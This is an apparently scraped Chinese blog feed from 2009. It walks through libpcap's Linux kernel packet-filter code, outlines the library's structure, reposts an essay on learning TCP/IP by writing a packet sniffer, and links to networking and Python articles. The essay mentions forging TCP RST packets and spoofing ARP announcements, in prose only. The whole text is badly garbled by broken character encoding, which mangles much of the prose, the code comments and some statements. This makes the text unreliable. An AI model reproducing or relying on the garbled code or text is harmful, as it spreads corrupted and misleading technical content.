前面我们曄��提到�Q�在内核�I�间�q��o数据包对整个捕获机制的效率是臛_��重要的。早期��?SOCK_PACKET 方式�?Linux 不支持内核过滤，因此�q��o操作只能在用��L��间执行（请参阅函�?pcap_read_packet() 代码�Q?在《UNIX �|�络�~�程(�W�一�?》（参考资�?B�Q�的�W?26 章中�Ҏ��有明��的描述。不�q�现在看��h��情况已经发生改变�Q�linux �?PF_PACKET �c�d��?socket 上支持内核过滤。Linux 内核允许我们把一个名�?LPF(Linux Packet Filter) 的过滤器直接攑ֈ� PF_PACKET �c�d�� socket 的处理过�E�中�Q�过滤器在网卡接收中断执行后立即执行。LSF ��Z�� BPF 机制�Q�但两者在实现上有略微的不同。实际代码如下：

/* 在包捕获讑֤�上附�?BPF 代码 [pcap-linux.c]*/ static int pcap_setfilter_linux(pcap_t *handle, struct bpf_program *filter) { #ifdef SO_ATTACH_FILTER struct sock_fprog fcode; int can_filter_in_kernel; int err = 0; #endif /* ��查句柄和�q��o器结构的正确�?*/ if (!handle) return -1; if (!filter) { strncpy(handle->errbuf, "setfilter: No filter specified", sizeof(handle->errbuf)); return -1; } /* 具体描述如下 */ if (install_bpf_program(handle, filter) < 0) return -1; /* �~�省情况下在用户�I�间�q�行�q��o�?但如果在内核安装成功,则��gؓ 1 */ handle->md.use_bpf = 0; /* ��试在内核安装过滤器 */ #ifdef SO_ATTACH_FILTER #ifdef USHRT_MAX if (handle->fcode.bf_len > USHRT_MAX) { /*�q��o器代码太长，内核不支�?*/ fprintf(stderr, "Warning: Filter too complex for kernel\n"); fcode.filter = NULL; can_filter_in_kernel = 0; } else #endif /* USHRT_MAX */ { /* linux 内核讄��q��o器时使用的数据结构是 sock_fprog�Q�而不�?BPF 的结�?bpf_program ,因此应做�l�构之间的�{�?*/ switch (fix_program(handle, &fcode)) { /* 严重错误�Q�直接退�?*/ case -1: default: return -1; /* 通过��查，但不能工作在内核�?*/ case 0: can_filter_in_kernel = 0; break; /* BPF 可以在内�怸�工作 */ case 1: can_filter_in_kernel = 1; break; } } /* 如果可以在内�怸��q��o�Q�则安装�q��o器到内核�?*/ if (can_filter_in_kernel) { if ((err = set_kernel_filter(handle, &fcode)) == 0) { /* 安装成功 !!! */ handle->md.use_bpf = 1; } else if (err == -1) /* 出现非致命性错�?*/ { if (errno != ENOPROTOOPT && errno != EOPNOTSUPP) { fprintf(stderr, "Warning: Kernel filter failed: %s\n",pcap_strerror(errno)); } } } /* 如果不能在内�怸�使用�q��o器，则去掉曾�l�可能在�?socket 上安装的内核�q��o器。主要目的是��Z��避免存在的过滤器�Ҏ��据包�q��o的干�?*/ if (!handle->md.use_bpf) reset_kernel_filter(handle);[pcap-linux.c] #endif } /* �?BPF 代码拯��?pcap_t 数据�l�构�?fcode �?*/ int install_bpf_program(pcap_t *p, struct bpf_program *fp) { size_t prog_size; /* 首先释放可能已存在的 BPF 代码 */ pcap_freecode(&p->fcode); /* 计算�q��o代码的长度，分配内存�I�间 */ prog_size = sizeof(*fp->bf_insns) * fp->bf_len; p->fcode.bf_len = fp->bf_len; p->fcode.bf_insns = (struct bpf_insn *)malloc(prog_size); if (p->fcode.bf_insns == NULL) { snprintf(p->errbuf, sizeof(p->errbuf), "malloc: %s", pcap_strerror(errno)); return (-1); } /* 把过滤代码保存在捕获句柄�?*/ memcpy(p->fcode.bf_insns, fp->bf_insns, prog_size); return (0); } /* 在内�怸�安装�q��o�?*/ static int set_kernel_filter(pcap_t *handle, struct sock_fprog *fcode) { int total_filter_on = 0; int save_mode; int ret; int save_errno; /*在设�|�过滤器前，socket 的数据包接收队列中可能已存在若干数据包。当讄��q��o器后�Q? �q�些数据包极有可能不满��q��o条�g�Q�但它们不被�q��o器丢弃。这意味着�Q? 传递到用户�I�间的头几个数据包不满��q��o条�g。注意到在用��L��间过滤这不是问题�Q? 因�ؓ用户�I�间的过滤器是在包进入队列后执行的。Libpcap 解决�q�个问题的方法是在设�|�过滤器之前�Q�首先读完接攉��列中所有的数据包�? 具体步骤如下�?/ /*��Z��避免无限循环的情况发生（反复的读数据包�ƈ丢弃�Q�但新的数据包不停的到达�Q�，首先讄��一个过滤器�Q�阻止所有的包进�?*/ setsockopt(handle->fd, SOL_SOCKET, SO_ATTACH_FILTER, &total_fcode, sizeof(total_fcode)�Q? /* 保存 socket 当前的属�?*/ save_mode = fcntl(handle->fd, F_GETFL, 0); /* 讄�� socket 它�ؓ非阻塞模�?*/ fcntl(handle->fd, F_SETFL, save_mode | O_NONBLOCK)�Q? /* 反复读队列中的数据包�Q�直到没有数据包可读。这意味着接收队列已被清空 */ while (recv(handle->fd, &drain, sizeof drain, MSG_TRUNC) >= 0)�Q? /* 恢复曾保存的 socket 属�?*/ fcntl(handle->fd, F_SETFL, save_mode); /* 现在安装新的�q��o�?*/ setsockopt(handle->fd, SOL_SOCKET, SO_ATTACH_FILTER, fcode, sizeof(*fcode)); } /* 释放 socket 上可能有的内核过滤器 */ static int reset_kernel_filter(pcap_t *handle) { int dummy; return setsockopt(handle->fd, SOL_SOCKET, SO_DETACH_FILTER, &dummy, sizeof(dummy)); }

linux 在安装和卸蝲�q��o器时都��用了函数 setsockopt()�Q�其中标志SOL_SOCKET 代表了对 socket �q�行讄��Q��?SO_ATTACH_FILTER �?SO_DETACH_FILTER 则分别对应了安装和卸载。下面是 linux 2.4.29 版本中的相关代码�Q?/p>

[net/core/sock.c] #ifdef CONFIG_FILTER case SO_ATTACH_FILTER: …… /* 把过滤条件结构从用户�I�间拯��到内核空�?*/ if (copy_from_user(&fprog, optval, sizeof(fprog))) break; /* �?socket 上安装过滤器 */ ret = sk_attach_filter(&fprog, sk); …… case SO_DETACH_FILTER: /* 使用自旋锁锁�?socket */ spin_lock_bh(&sk->lock.slock); filter = sk->filter; /* 如果�?socket 上有�q��o器，则简单设�|��ؓ�I�，�q��放过滤器内存 */ if (filter) { sk->filter = NULL; spin_unlock_bh(&sk->lock.slock); sk_filter_release(sk, filter); break; } spin_unlock_bh(&sk->lock.slock); ret = -ENONET; break; #endif

上面出现�?sk_attach_filter() 定义�?net/core/filter.c�Q�它把结构sock_fprog 转换为结�?sk_filter, 最后把此结构设�|��ؓ socket 的过滤器�Q�sk->filter = fp�?/p>

其他代码

libpcap �q�提供了其它若干函数�Q�但基本上是提供辅助或扩展功能，重要性相对弱一炏V��我个�h认�ؓ�Q�函�?pcap_dump_open() �?pcap_open_offline() 可能比较有用�Q��用它们能把在�U�的数据包写入文件�ƈ事后�q�行分析处理�?/p>

�ȝ��

1994 �q?libpcap 的第一个版本被发布�Q�到现在已有 11 �q�的历史�Q�如今libpcap 被广泛的应用在各�U�网�l�监控��Y件中。Libpcap 最主要的优点在于��^台无��x��，用户�E�序几乎不需做�Q何改动就可移植到其它 unix �q�_��上；其次�Q�libpcap也能适应各种�q��o机制�Q�特别对BPF的支持最好。分析它的源代码�Q�可以学习开发者优�U�的设计思想和实现技巧，也能了解刎ͼ�linux�Q�操作系�l�的�|�络内核实现�Q�对个�h能力的提高有很大帮助�?/p>

矛_��@ 2009-07-09 22:01 发表评论

矛_��@ — Sun, 05 Jul 2009 14:26:00 GMT
libpcap体现的不是捕捉技术上的难点，而是对细节的控制上，对跨�q�_��代码的编写上�Q�对�q��o机制的优化上�?
大象的命门是在脚�{�，也就是支撑的地方�?很显�Ӟ��得先�Ҏ��口的��动和他的数据结构有个了解。而且在这套库里面看到了好多�h的代码和自己的功能说明，感觉着一�U�合作开攄��_��?
剪枝删节�Q�将其中linux部分提了出来�Q�涉及到的文件大概有�Q?
    inet.c fad-getad.c pcap-linux.c pcap-int.h pcap.c
整个的大概结构是�Q�查找设备，��定讑֤��Q�过滤条件的嵌入�Q�套接字的创建，�|�卡的设�|�，包的捕获�?


    查找讑֤�:用到的函数有pcap_lookupdev()-pcap_findalldevs()-getifaddrs()-add_addr_to_iflist()//inet.c fad_getad.c
该函数是��所扑ֈ�的设备信息用�q�表�q�接��h��Q�设备号��的在前�Q�因此通常是eth0.
数据�l�构为struct pcap_if{},//pcap.h

    打开�|�络讑֤��Q?�?以后的linux内核版本用新的协议簇PF_PACKET来实现。早期是(SOCK_PACKET)他的形式可以是SOCK_RAW和SOCK_DGRAM。RAW是原始数据，DGRAM是对数据包进行加工，把数据包的链路层头部��L��Q��用sockaddr_ll来保存。在两种情况下RAW不可用：某些�c�d��讑֤�数据链�\层头部不可用�Q�当捕捉为any�Ӟ��Z��是包�q��o机制在所有类型数据包上正常工作，要求所有数据��用相同数据链路头部�?
    pcap-linux.c
    pcap_open_live()�Q�用到的数据�l�构是pcap_t,//pcap-int.h,�q�是一个比较重要的参数�Q�主要包括对socket的描�q�ͼ�和一些底层上的设�|�。比如缓冲区大小�Q�设备类型，边界寚w��{�，对应的函数指针，可更改的链�\敎ͼ�BPF�q��o代码是否能��用等�?
   pcap_stat stat;//pcap.h,捕捉状态结构，包括是否�q��o�Q�接受包的数目，丢弃的数目等�?
   在函数内部有new和old两种版本�Q�分别对2.0前后的版本创建socket.而在其内部的选择上，又涉及到�Ҏ��否支持链路层头部�l�构的判断，最后将�|�卡设�ؓ��h��模式�Q�创建socket
   在这一层中�Q�libpcap提供的用��L��序接口是pcap_next()//pcap.c�Q�通过跟踪可发玎ͼ�它最后是调用pcap_read_packet//pcap-linux.c接收。接收完后做的工作如下：偏移量设�|�，��Z��l�伪数据链�\层留出空��_��接着要修正长度，判断是否有用内核�U�的包过滤，最后填充捕��h��?长度/旉��Q�对包数据篏加�?

   完成以上两个步骤�Q�发现最关键两个步骤��是找设备的函数�Q�和socket的创建。但是通过查看源代码可知，作者在跨��^収ͼ��l�节处理�Q�包通用的完善性上做了很多很多的工作，�q�无一不给我们提供了一个很好的学习��度�?

   接下来是对过滤机制的描述�Q?
�q�个我想是最有难点的地方了，一些算法不做描�q�ͼ�查看pcap-bpf.h,gencode.c,optimize.c,grammar,c,scanner.c
用到的特性有�q�么几个�Q�因为在捕捉�Ӟ��是先�l�过捕捉�Q�然后把控制权再�l�数据链路，�q�样��q��接在内核�~�冲内进行过滤。而在��法是上使用BPF包过滤机�Ӟ��法上很复杂�Q��用伪机器码的方式�Q�类��g��汇编语言。如果是以后做到�c�M��多重判断跌��{之类的可以参考里面的无环控制��图CFG的实�?
    个�h认�ؓ该库很大一部分研究价值除了跨�q�_��~�写�Q�还有就是对linux底层�q��o器的调用使用�?

矛_��@ 2009-07-05 22:26 发表评论

矛_��@ — Sun, 05 Jul 2009 12:50:00 GMT
一个前辈写的自己学习网路协议的�Ҏ��Q�感觉挺好的�Q��{载于此：

�|�络�q�东西就是一个靠实践的东西，只靠看书是不行的。当�q�在学校�q�上�q�史��林教授/张公忠教授所讲的计算机网�l�体�pȝ��构课�Q�用的是Tanabaum写的那本�Q�考试�q�得了九十多分，可实际还是连TCP和UDP有什么区别都分不清，��是死记背，到毕业的时候基本上是忘光了�Q�工作后�{�于重新来过�?
      上班了要在Linux做一些底层的�|�络处理�Q�不得不从头来学Linux和网�l�，�~�程部分主要看Richard Stevens的那几本书：APUE、UNP、TCP/IP Illustraion�{�，学Linux则看得很杂，市面上各�U�Linux入门书大都翻了一遍，俺是习惯在书店里看书�Q�爱看书而不�׃��书，汗，�Q�然后就是去各大BBS、论坛把他们的精华区都下载下来狂看，边看边实践，基本上在一个月内熟悉了Linux的操作�?
           学网�l�协议刚开始也是看书，但看了之后没多少印象�Q�那些东襉K��死记真是没法记的�Q�后来找��C��个好办法�Q�就是自己写个sniffer�Q�自己写个协议分析器�Q�先学怎么抓包�Q�就看tcpdump的源码，然后看libpcap的源码，知道了什么是�|�卡的�؜杂模式，很快��p��抓到�|�卡上包的。接下来��是对包�q�行分析�Q�就看作TCP/IP Illustraion�Q�从以太头、ARP/IP、ICMP/IGMP/TCP/UDP、HTTP/FTP/TELNET/SMTP�{�这么一点一炏V��一个字�D�一个字�D�分析下来，很快��明白了所谓TCP/IP到底是怎么回事。另外�ؓ了学TCP状态�{换表�Q�根据所抓的包的TCP标志分析通信双方当前是什么状态，刚开始还只能从头一方发SYN包开始分析，到后来是可从�q�接中间包如手就能逐渐判断双方的TCP状态，基本上是��d��搞清楚了TCP的状态�{�U�L��怎么回事�Q�后来再理解防火墙的状态检��原理就很容易了。另外在分析�q�程中，为彻底掌握IP��片�Q�还特地ping大包来抓�Q�把抓上来的包自己重�l�，搞明白了IP头的��片offset字段是怎么用的�?
          能抓包后�q�而又开始学如何自己构造包�?#8220;�q�扰”正常通信了，开始是学怎么发TCP的RST包来切断一个正常的TCP�q�接�Q�就的学会如何计��IP头校验和�Q�TCP校验和，知道了算TCP校验和时必须加IP伪头数据�Q�然后是正确计算序列号和��认��P��知道了原来SYN和FIN标志也是��一位的�Q�最重要的是理解了什么是�|�络序什么是��L��序，现在基本把ntohs(l),htons(l)处理都成了一�U�编�E�的本能意识了。学会用RST切断TCP后，�q�一步实��C��直接发一个页面信息告诉客��L��讉K��了非法信息，也就是以后实现URL�q��o时客��L��昄��的拒�l�画面。后来也学发ARP信息胡�ؕ通告MAC地址�Q�也��是以前写的那篇ARP��d��的由来�?
           后来俺写的这个协议分析器逐步完善�Q�能解析的就解析�Q�不能解析的��打印出16�q�制敎ͼ�可打印字�W�也打印出来�Q�对HTTP、FTP、POP3、SMTP�q�些文本协议几乎��׃��下看明白了，对于非文本协议，如DNS�Q�也�Ҏ��协议解析了出来，而且解析DNS时不得不用了我一向不��q��的递归�Ҏ��来编�E�。随着�|�络应用的增加，在用到前都先作协议解析，除了各种TCP、UDP的协议，�q�增加了BPDU、PPPOE、OSPF、ESP、AH、IKE�{�的解析处理�Q�现在俺的协议分析器也可以分析上癄��协议�Q��^时抓包就只用��个，TCPDUMP基本不再用了�Q�毕竟自己写的自己更清楚�Q�如果有不能解析的再现加�q�去。现在学新协议时�Q�往往先抓包看看协议的基本数据格式�Q�再看RFC了解�l�节�?
              学协议刚开始是看书�Q�到后来要更深入了解或追询最新发展情况就只能看RFC了，毕竟�|�络的东西变化太快，书的东西只能��入门，说不定很快就出新的了�Q�到现在也看了数癄��的RFC了�?
             通过�~�程分析来学协议�Q�慢是慢了点�Q�花了一个多月的旉��Q�但感觉学得扎实�Q�正所谓磨刀不误砍柴功，而且一通百通。到现在虽然已经好几�q�了�Q�IP��_��TCP头有哪些字段�q�是一下就可以说得出来�Q�对理解各种�|�络��d��原理从而进行防范更是有帮助�Q�我觉得�Ҏ��来说�q�种�Ҏ��是很有效�Q�如果哪位觉得有更有效的学习�Ҏ��Q�可以共同交��一下�?/p>
出处�Q�http://blog.csdn.net/eroswang/archive/2008/10/02/3008146.aspx

矛_��@ 2009-07-05 20:50 发表评论

高性能�|�络�~�程�Q�第 2 部分: 加快客户机和服务器的处理速度

矛_��@ — Sun, 05 Jul 2009 02:25:00 GMT

http://www.ibm.com/developerworks/cn/aix/library/au-highperform2/index.html#resources

矛_��@ 2009-07-05 10:25 发表评论

高性能�|�络�~�程�Q�第 1 部分: 最大程度地利用您的�|�络资源

矛_��@ — Sun, 05 Jul 2009 02:24:00 GMT
http://www.ibm.com/developerworks/cn/aix/library/au-highperform1/?S_TACT=105AGX52&S_CMP=tut-cto

矛_��@ 2009-07-05 10:24 发表评论

开始工具python

矛_��@ — Sun, 05 Jul 2009 02:07:00 GMT
     摘要: 工具地址�Q�www.python.org 然后��q��旉��学习一下去语法�Q? Python基础��? 整理�Q�Jims of 肥肥世家 Copyright © 2004�Q?005�Q?006 本文遵从GNU 的自由文档许可证(Free Document License)的条�ƾ，�Ƣ迎...  阅读全文

矛_��@ 2009-07-05 10:07 发表评论